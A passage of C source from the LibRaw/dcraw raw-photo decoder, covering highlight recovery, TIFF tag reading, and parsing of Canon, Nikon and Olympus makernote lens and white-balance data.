{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
static const float itrans[2][4][4] =
{ { { 1,0.8660254,-0.5 }, { 1,-0.8660254,-0.5 }, { 1,0,1 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
float cam[2][4], lab[2][4], sum[2], chratio;
if ((unsigned) (colors-3) > 1) return;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Blending highlights...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,0,2);
#endif
FORCC if (clip > (i = 65535*pre_mul[c])) clip = i;
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
FORCC if (image[row*width+col][c] > clip) break;
if (c == colors) continue;
FORCC {
cam[0][c] = image[row*width+col][c];
cam[1][c] = MIN(cam[0][c],clip);
}
for (i=0; i < 2; i++) {
FORCC for (lab[i][c]=j=0; j < colors; j++)
lab[i][c] += trans[colors-3][c][j] * cam[i][j];
for (sum[i]=0,c=1; c < colors; c++)
sum[i] += SQR(lab[i][c]);
}
chratio = sqrt(sum[1]/sum[0]);
for (c=1; c < colors; c++)
lab[0][c] *= chratio;
FORCC for (cam[0][c]=j=0; j < colors; j++)
cam[0][c] += itrans[colors-3][c][j] * lab[0][j];
FORCC image[row*width+col][c] = cam[0][c] / colors;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,1,2);
#endif
}
#define SCALE (4 >> shrink)
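/* recover_highlights() rebuilds clipped channels from the channel with the
 * largest multiplier (the one that clips last): it builds a low-resolution
 * SCALE x SCALE map of the ratio between the clipped channel and that
 * reference channel measured just below clipping, diffuses the map outward
 * into fully clipped regions, and then rescales clipped pixels by the mapped
 * ratio.
 */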
void CLASS recover_highlights()
{
float *map, sum, wgt, grow;
int hsat[4], count, spread, change, val, i;
unsigned high, wide, mrow, mcol, row, col, kc, c, d, y, x;
ushort *pixel;
static const signed char dir[8][2] =
{ {-1,-1}, {-1,0}, {-1,1}, {0,1}, {1,1}, {1,0}, {1,-1}, {0,-1} };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Rebuilding highlights...\n"));
#endif
grow = pow (2.0, 4-highlight);
FORCC hsat[c] = 32000 * pre_mul[c];
for (kc=0, c=1; c < colors; c++)
if (pre_mul[kc] < pre_mul[c]) kc = c;
high = height / SCALE;
wide = width / SCALE;
map = (float *) calloc (high, wide*sizeof *map);
merror (map, "recover_highlights()");
FORCC if (c != kc) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,c-1,colors-1);
#endif
memset (map, 0, high*wide*sizeof *map);
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
sum = wgt = count = 0;
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] == 1 && pixel[kc] > 24000) {
sum += pixel[c];
wgt += pixel[kc];
count++;
}
}
if (count == SCALE*SCALE)
map[mrow*wide+mcol] = sum / wgt;
}
for (spread = 32/grow; spread--; ) {
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
if (map[mrow*wide+mcol]) continue;
sum = count = 0;
for (d=0; d < 8; d++) {
y = mrow + dir[d][0];
x = mcol + dir[d][1];
if (y < high && x < wide && map[y*wide+x] > 0) {
sum += (1 + (d & 1)) * map[y*wide+x];
count += 1 + (d & 1);
}
}
if (count > 3)
map[mrow*wide+mcol] = - (sum+grow) / (count+grow);
}
for (change=i=0; i < high*wide; i++)
if (map[i] < 0) {
map[i] = -map[i];
change = 1;
}
if (!change) break;
}
for (i=0; i < high*wide; i++)
if (map[i] == 0) map[i] = 1;
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] > 1) {
val = pixel[kc] * map[mrow*wide+mcol];
if (pixel[c] < val) pixel[c] = CLIP(val);
}
}
}
}
free (map);
}
#undef SCALE
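/* tiff_get() reads one TIFF IFD entry (tag, type, count) and, when the value
 * does not fit in the 4 inline bytes, seeks to the external value offset; the
 * "11124811248484" string maps TIFF type codes to their byte sizes.
 */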
void CLASS tiff_get (unsigned base,
unsigned *tag, unsigned *type, unsigned *len, unsigned *save)
{
*tag = get2();
*type = get2();
*len = get4();
*save = ftell(ifp) + 4;
if (*len * ("11124811248484"[*type < 14 ? *type:0]-'0') > 4)
fseek (ifp, get4()+base, SEEK_SET);
}
void CLASS parse_thumb_note (int base, unsigned toff, unsigned tlen)
{
unsigned entries, tag, type, len, save;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == toff) thumb_offset = get4()+base;
if (tag == tlen) thumb_length = get4();
fseek (ifp, save, SEEK_SET);
}
}
//@end COMMON
int CLASS parse_tiff_ifd (int base);
//@out COMMON
static float powf_lim(float a, float b, float limup)
{
return (b>limup || b < -limup)?0.f:powf(a,b);
}
static float libraw_powf64(float a, float b)
{
return powf_lim(a,b,64.f);
}
#ifdef LIBRAW_LIBRARY_BUILD
static float my_roundf(float x) {
float t;
if (x >= 0.0) {
t = ceilf(x);
if (t - x > 0.5) t -= 1.0;
return t;
} else {
t = ceilf(-x);
if (t + x > 0.5) t -= 1.0;
return -t;
}
}
static float _CanonConvertAperture(ushort in)
{
if ((in == (ushort)0xffe0) || (in == (ushort)0x7fff)) return 0.0f;
return libraw_powf64(2.0, in/64.0);
}
static float _CanonConvertEV (short in)
{
short EV, Sign, Frac;
float Frac_f;
EV = in;
if (EV < 0) {
EV = -EV;
Sign = -1;
} else {
Sign = 1;
}
Frac = EV & 0x1f;
EV -= Frac; // remove fraction
if (Frac == 0x0c) { // convert 1/3 and 2/3 codes
Frac_f = 32.0f / 3.0f;
} else if (Frac == 0x14) {
Frac_f = 64.0f / 3.0f;
} else Frac_f = (float) Frac;
return ((float)Sign * ((float)EV + Frac_f))/32.0f;
}
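/* setCanonBodyFeatures() maps the Canon model ID to sensor format (APS-H,
 * full frame, or APS-C) and lens mount (EF, EF-M, or fixed lens for compact
 * cameras not covered by the interchangeable-lens IDs).
 */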
void CLASS setCanonBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
if (
(id == 0x80000001) || // 1D
(id == 0x80000174) || // 1D2
(id == 0x80000232) || // 1D2N
(id == 0x80000169) || // 1D3
(id == 0x80000281) // 1D4
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSH;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000167) || // 1Ds
(id == 0x80000188) || // 1Ds2
(id == 0x80000215) || // 1Ds3
(id == 0x80000269) || // 1DX
(id == 0x80000328) || // 1DX2
(id == 0x80000324) || // 1DC
(id == 0x80000213) || // 5D
(id == 0x80000218) || // 5D2
(id == 0x80000285) || // 5D3
(id == 0x80000349) || // 5D4
(id == 0x80000382) || // 5DS
(id == 0x80000401) || // 5DS R
(id == 0x80000302) // 6D
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000331) || // M
(id == 0x80000355) || // M2
(id == 0x80000374) || // M3
(id == 0x80000384) || // M10
(id == 0x80000394) // M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF_M;
}
else
if (
(id == 0x01140000) || // D30
(id == 0x01668000) || // D60
(id > 0x80000000)
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Unknown;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
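/* processCanonCameraInfo() extracts lens data (lens ID, focal range, current
 * focal length and, on some bodies, the lens name) from the binary CameraInfo
 * makernote block; the field offsets are specific to each camera model, so
 * every access is bounds-checked against the block length.
 */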
void CLASS processCanonCameraInfo (unsigned id, uchar *CameraInfo, unsigned maxlen)
{
ushort iCanonLensID = 0, iCanonMaxFocal = 0, iCanonMinFocal = 0, iCanonLens = 0, iCanonCurFocal = 0, iCanonFocalType = 0;
if(maxlen<16) return; // too short, so broken
CameraInfo[0] = 0;
CameraInfo[1] = 0;
switch (id) {
case 0x80000001: // 1D
case 0x80000167: // 1DS
iCanonCurFocal = 10;
iCanonLensID = 13;
iCanonMinFocal = 14;
iCanonMaxFocal = 16;
if (!imgdata.lens.makernotes.CurFocal)
imgdata.lens.makernotes.CurFocal = sget2(CameraInfo + iCanonCurFocal);
if (!imgdata.lens.makernotes.MinFocal)
imgdata.lens.makernotes.MinFocal = sget2(CameraInfo + iCanonMinFocal);
if (!imgdata.lens.makernotes.MaxFocal)
imgdata.lens.makernotes.MaxFocal = sget2(CameraInfo + iCanonMaxFocal);
break;
case 0x80000174: // 1DMkII
case 0x80000188: // 1DsMkII
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
iCanonFocalType = 45;
break;
case 0x80000232: // 1DMkII N
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
break;
case 0x80000169: // 1DMkIII
case 0x80000215: // 1DsMkIII
iCanonCurFocal = 29;
iCanonLensID = 273;
iCanonMinFocal = 275;
iCanonMaxFocal = 277;
break;
case 0x80000281: // 1DMkIV
iCanonCurFocal = 30;
iCanonLensID = 335;
iCanonMinFocal = 337;
iCanonMaxFocal = 339;
break;
case 0x80000269: // 1D X
iCanonCurFocal = 35;
iCanonLensID = 423;
iCanonMinFocal = 425;
iCanonMaxFocal = 427;
break;
case 0x80000213: // 5D
iCanonCurFocal = 40;
if (!sget2Rev(CameraInfo + 12)) iCanonLensID = 151;
else iCanonLensID = 12;
iCanonMinFocal = 147;
iCanonMaxFocal = 149;
break;
case 0x80000218: // 5DMkII
iCanonCurFocal = 30;
iCanonLensID = 230;
iCanonMinFocal = 232;
iCanonMaxFocal = 234;
break;
case 0x80000285: // 5DMkIII
iCanonCurFocal = 35;
iCanonLensID = 339;
iCanonMinFocal = 341;
iCanonMaxFocal = 343;
break;
case 0x80000302: // 6D
iCanonCurFocal = 35;
iCanonLensID = 353;
iCanonMinFocal = 355;
iCanonMaxFocal = 357;
break;
case 0x80000250: // 7D
iCanonCurFocal = 30;
iCanonLensID = 274;
iCanonMinFocal = 276;
iCanonMaxFocal = 278;
break;
case 0x80000190: // 40D
iCanonCurFocal = 29;
iCanonLensID = 214;
iCanonMinFocal = 216;
iCanonMaxFocal = 218;
iCanonLens = 2347;
break;
case 0x80000261: // 50D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000287: // 60D
iCanonCurFocal = 30;
iCanonLensID = 232;
iCanonMinFocal = 234;
iCanonMaxFocal = 236;
break;
case 0x80000325: // 70D
iCanonCurFocal = 35;
iCanonLensID = 358;
iCanonMinFocal = 360;
iCanonMaxFocal = 362;
break;
case 0x80000176: // 450D
iCanonCurFocal = 29;
iCanonLensID = 222;
iCanonLens = 2355;
break;
case 0x80000252: // 500D
iCanonCurFocal = 30;
iCanonLensID = 246;
iCanonMinFocal = 248;
iCanonMaxFocal = 250;
break;
case 0x80000270: // 550D
iCanonCurFocal = 30;
iCanonLensID = 255;
iCanonMinFocal = 257;
iCanonMaxFocal = 259;
break;
case 0x80000286: // 600D
case 0x80000288: // 1100D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000301: // 650D
case 0x80000326: // 700D
iCanonCurFocal = 35;
iCanonLensID = 295;
iCanonMinFocal = 297;
iCanonMaxFocal = 299;
break;
case 0x80000254: // 1000D
iCanonCurFocal = 29;
iCanonLensID = 226;
iCanonMinFocal = 228;
iCanonMaxFocal = 230;
iCanonLens = 2359;
break;
}
if (iCanonFocalType)
{
if(iCanonFocalType>=maxlen) return; // broken;
imgdata.lens.makernotes.FocalType = CameraInfo[iCanonFocalType];
if (!imgdata.lens.makernotes.FocalType) // zero means 'fixed' here, replacing with standard '1'
imgdata.lens.makernotes.FocalType = 1;
}
if (!imgdata.lens.makernotes.CurFocal)
{
if(iCanonCurFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.CurFocal = sget2Rev(CameraInfo + iCanonCurFocal);
}
if (!imgdata.lens.makernotes.LensID)
{
if(iCanonLensID>=maxlen) return; // broken;
imgdata.lens.makernotes.LensID = sget2Rev(CameraInfo + iCanonLensID);
}
if (!imgdata.lens.makernotes.MinFocal)
{
if(iCanonMinFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MinFocal = sget2Rev(CameraInfo + iCanonMinFocal);
}
if (!imgdata.lens.makernotes.MaxFocal)
{
if(iCanonMaxFocal>=maxlen) return; // broken;
imgdata.lens.makernotes.MaxFocal = sget2Rev(CameraInfo + iCanonMaxFocal);
}
if (!imgdata.lens.makernotes.Lens[0] && iCanonLens) {
if(iCanonLens+64>=maxlen) return; // broken;
if (CameraInfo[iCanonLens] < 65) // non-Canon lens
{
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 64);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-S", 4))
{
memcpy(imgdata.lens.makernotes.Lens, "EF-S ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "TS-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "TS-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "TS-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "MP-E", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "MP-E ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "MP-E", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else if (!strncmp((char *)CameraInfo + iCanonLens, "EF-M", 4)) {
memcpy(imgdata.lens.makernotes.Lens, "EF-M ", 5);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF-M", 4);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
memcpy(imgdata.lens.makernotes.Lens + 5, CameraInfo + iCanonLens + 4, 60);
}
else {
memcpy(imgdata.lens.makernotes.Lens, CameraInfo + iCanonLens, 2);
memcpy(imgdata.lens.makernotes.LensFeatures_pre, "EF", 2);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.Lens[2] = 32;
memcpy(imgdata.lens.makernotes.Lens + 3, CameraInfo + iCanonLens + 2, 62);
}
}
return;
}
void CLASS Canon_CameraSettings ()
{
fseek(ifp, 10, SEEK_CUR);
imgdata.shootinginfo.DriveMode = get2(); get2();
imgdata.shootinginfo.FocusMode = get2();
fseek(ifp, 18, SEEK_CUR);
imgdata.shootinginfo.MeteringMode = get2(); get2();
imgdata.shootinginfo.AFPoint = get2();
imgdata.shootinginfo.ExposureMode = get2(); get2();
imgdata.lens.makernotes.LensID = get2();
imgdata.lens.makernotes.MaxFocal = get2();
imgdata.lens.makernotes.MinFocal = get2();
imgdata.lens.makernotes.CanonFocalUnits = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.MaxFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
imgdata.lens.makernotes.MinFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
imgdata.lens.makernotes.MaxAp = _CanonConvertAperture(get2());
imgdata.lens.makernotes.MinAp = _CanonConvertAperture(get2());
fseek(ifp, 12, SEEK_CUR);
imgdata.shootinginfo.ImageStabilization = get2();
}
void CLASS Canon_WBpresets (int skip1, int skip2)
{
int c;
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
if (skip1) fseek(ifp, skip1, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
if (skip2) fseek(ifp, skip2, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
return;
}
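/* Canon_WBCTpresets() reads the 15-entry white-balance / color-temperature
 * table; the field order and scaling differ between ColorData layouts, which
 * is what the WBCTversion argument (and, for version 2, the camera ID) selects.
 */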
void CLASS Canon_WBCTpresets (short WBCTversion)
{
if (WBCTversion == 0)
for (int i=0; i<15; i++) // tint, as shot R, as shot B, CCT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f /fMAX(get2(),1.f) ;
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f /fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if (WBCTversion == 1)
for (int i=0; i<15; i++) // as shot R, as shot B, tint, CCT
{
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(get2(),1.f);
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(get2(),1.f);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x80000374) || // M3
(unique_id == 0x80000384) || // M10
(unique_id == 0x80000394) || // M5
(unique_id == 0x03970000))) // G7 X Mark II
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CCT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][3] = 1024.0f / fMAX(1.f,get2());
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
else if ((WBCTversion == 2) &&
((unique_id == 0x03950000) || (unique_id == 0x03930000))) // G5 X, G9 X
for (int i=0; i<15; i++) // tint, offset, as shot R, as shot B, CCT
{
fseek (ifp, 2, SEEK_CUR);
fseek (ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 1.0f;
imgdata.color.WBCT_Coeffs[i][1] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][3] = (float)get2() / 512.0f;
imgdata.color.WBCT_Coeffs[i][0] = get2();
}
return;
}
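/* processNikonLensData() decodes the Nikon LensData makernote block: the lens
 * type flags select the mount and the AF/VR feature strings, short blocks
 * carry the focal range as 5*2^(x/24) mm and apertures as 2^(x/24), and long
 * blocks (len 459/509/590/879) embed a plain-text lens name.
 */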
void CLASS processNikonLensData (uchar *LensData, unsigned len)
{
ushort i;
if (!(imgdata.lens.nikon.NikonLensType & 0x01))
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'A';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
else
{
imgdata.lens.makernotes.LensFeatures_pre[0] = 'M';
imgdata.lens.makernotes.LensFeatures_pre[1] = 'F';
}
if (imgdata.lens.nikon.NikonLensType & 0x02)
{
if (imgdata.lens.nikon.NikonLensType & 0x04)
imgdata.lens.makernotes.LensFeatures_suf[0] = 'G';
else
imgdata.lens.makernotes.LensFeatures_suf[0] = 'D';
imgdata.lens.makernotes.LensFeatures_suf[1] = ' ';
}
if (imgdata.lens.nikon.NikonLensType & 0x08)
{
imgdata.lens.makernotes.LensFeatures_suf[2] = 'V';
imgdata.lens.makernotes.LensFeatures_suf[3] = 'R';
}
if (imgdata.lens.nikon.NikonLensType & 0x10)
{
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_1INCH;
}
else
imgdata.lens.makernotes.LensMount = imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_F;
if (imgdata.lens.nikon.NikonLensType & 0x20)
{
strcpy(imgdata.lens.makernotes.Adapter, "FT-1");
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Nikon_F;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Nikon_CX;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
imgdata.lens.nikon.NikonLensType = imgdata.lens.nikon.NikonLensType & 0xdf;
if (len < 20) {
switch (len) {
case 9:
i = 2;
break;
case 15:
i = 7;
break;
case 16:
i = 8;
break;
default:
return; // unknown short LensData layout: do not index with an undefined offset
}
imgdata.lens.nikon.NikonLensIDNumber = LensData[i];
imgdata.lens.nikon.NikonLensFStops = LensData[i + 1];
imgdata.lens.makernotes.LensFStops = (float)imgdata.lens.nikon.NikonLensFStops /12.0f;
if (fabsf(imgdata.lens.makernotes.MinFocal) < 1.1f)
{
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 2])
imgdata.lens.makernotes.MinFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 2] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 3])
imgdata.lens.makernotes.MaxFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i + 3] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 4])
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(2.0f, (float)LensData[i + 4] / 24.0f);
if ((imgdata.lens.nikon.NikonLensType ^ (uchar)0x01) || LensData[i + 5])
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(2.0f, (float)LensData[i + 5] / 24.0f);
}
imgdata.lens.nikon.NikonMCUVersion = LensData[i + 6];
if (i != 2)
{
if ((LensData[i - 1]) &&
(fabsf(imgdata.lens.makernotes.CurFocal) < 1.1f))
imgdata.lens.makernotes.CurFocal = 5.0f * libraw_powf64(2.0f, (float)LensData[i - 1] / 24.0f);
if (LensData[i + 7]) imgdata.lens.nikon.NikonEffectiveMaxAp = libraw_powf64(2.0f, (float)LensData[i + 7] / 24.0f);
}
imgdata.lens.makernotes.LensID =
(unsigned long long) LensData[i] << 56 |
(unsigned long long) LensData[i + 1] << 48 |
(unsigned long long) LensData[i + 2] << 40 |
(unsigned long long) LensData[i + 3] << 32 |
(unsigned long long) LensData[i + 4] << 24 |
(unsigned long long) LensData[i + 5] << 16 |
(unsigned long long) LensData[i + 6] << 8 |
(unsigned long long) imgdata.lens.nikon.NikonLensType;
}
else if ((len == 459) || (len == 590))
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 390, 64);
}
else if (len == 509)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 391, 64);
}
else if (len == 879)
{
memcpy(imgdata.lens.makernotes.Lens, LensData + 680, 64);
}
return;
}
void CLASS setOlympusBodyFeatures (unsigned long long id)
{
imgdata.lens.makernotes.CamID = id;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-300
((id & 0x00ffff0000ULL) == 0x0030300000ULL))
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FT;
if ((id == 0x4434303430ULL) || // E-1
(id == 0x4434303431ULL) || // E-330
((id >= 0x5330303033ULL) && (id <= 0x5330303138ULL)) || // E-330 to E-520
(id == 0x5330303233ULL) || // E-620
(id == 0x5330303239ULL) || // E-450
(id == 0x5330303330ULL) || // E-600
(id == 0x5330303333ULL)) // E-5
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FT;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_mFT;
}
}
else
{
imgdata.lens.makernotes.LensMount =
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS parseCanonMakernotes (unsigned tag, unsigned type, unsigned len) {
if (tag == 0x0001) Canon_CameraSettings();
else if (tag == 0x0002) // focal length
{
imgdata.lens.makernotes.FocalType = get2();
imgdata.lens.makernotes.CurFocal = get2();
if (imgdata.lens.makernotes.CanonFocalUnits > 1)
{
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
}
else if (tag == 0x0004) // shot info
{
short tempAp;
fseek(ifp, 30, SEEK_CUR);
imgdata.other.FlashEC = _CanonConvertEV((signed short)get2());
fseek(ifp, 8-32, SEEK_CUR);
if ((tempAp = get2()) != 0x7fff)
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(tempAp);
if (imgdata.lens.makernotes.CurAp < 0.7f)
{
fseek(ifp, 32, SEEK_CUR);
imgdata.lens.makernotes.CurAp = _CanonConvertAperture(get2());
}
if (!aperture) aperture = imgdata.lens.makernotes.CurAp;
}
else if (tag == 0x0095 && // lens model tag
!imgdata.lens.makernotes.Lens[0])
{
fread(imgdata.lens.makernotes.Lens, 2, 1, ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
if (imgdata.lens.makernotes.Lens[0] < 65) // non-Canon lens
fread(imgdata.lens.makernotes.Lens + 2, 62, 1, ifp);
else
{
char efs[2];
imgdata.lens.makernotes.LensFeatures_pre[0] = imgdata.lens.makernotes.Lens[0];
imgdata.lens.makernotes.LensFeatures_pre[1] = imgdata.lens.makernotes.Lens[1];
fread(efs, 2, 1, ifp);
if (efs[0] == 45 && (efs[1] == 83 || efs[1] == 69 || efs[1] == 77))
{ // "EF-S, TS-E, MP-E, EF-M" lenses
imgdata.lens.makernotes.Lens[2] = imgdata.lens.makernotes.LensFeatures_pre[2] = efs[0];
imgdata.lens.makernotes.Lens[3] = imgdata.lens.makernotes.LensFeatures_pre[3] = efs[1];
imgdata.lens.makernotes.Lens[4] = 32;
if (efs[1] == 83)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_S;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
else if (efs[1] == 77)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF_M;
}
}
else
{ // "EF" lenses
imgdata.lens.makernotes.Lens[2] = 32;
imgdata.lens.makernotes.Lens[3] = efs[0];
imgdata.lens.makernotes.Lens[4] = efs[1];
}
fread(imgdata.lens.makernotes.Lens + 5, 58, 1, ifp);
}
}
else if (tag == 0x00a9)
{
long int save1 = ftell(ifp);
fseek (ifp, save1+(0x5<<1), SEEK_SET);
Canon_WBpresets(0,0);
fseek (ifp, save1, SEEK_SET);
}
else if (tag == 0x00e0) // sensor info
{
imgdata.makernotes.canon.SensorWidth = (get2(),get2());
imgdata.makernotes.canon.SensorHeight = get2();
imgdata.makernotes.canon.SensorLeftBorder = (get2(),get2(),get2());
imgdata.makernotes.canon.SensorTopBorder = get2();
imgdata.makernotes.canon.SensorRightBorder = get2();
imgdata.makernotes.canon.SensorBottomBorder = get2();
imgdata.makernotes.canon.BlackMaskLeftBorder = get2();
imgdata.makernotes.canon.BlackMaskTopBorder = get2();
imgdata.makernotes.canon.BlackMaskRightBorder = get2();
imgdata.makernotes.canon.BlackMaskBottomBorder = get2();
}
else if (tag == 0x4001 && len > 500)
{
int c;
long int save1 = ftell(ifp);
switch (len)
{
case 582:
imgdata.makernotes.canon.CanonColorDataVer = 1; // 20D / 350D
{
fseek (ifp, save1+(0x23<<1), SEEK_SET);
Canon_WBpresets(2,2);
fseek (ifp, save1+(0x4b<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 653:
imgdata.makernotes.canon.CanonColorDataVer = 2; // 1Dmk2 / 1DsMK2
{
fseek (ifp, save1+(0x27<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa4<<1), SEEK_SET);
Canon_WBCTpresets (1); // ABCT
}
break;
case 796:
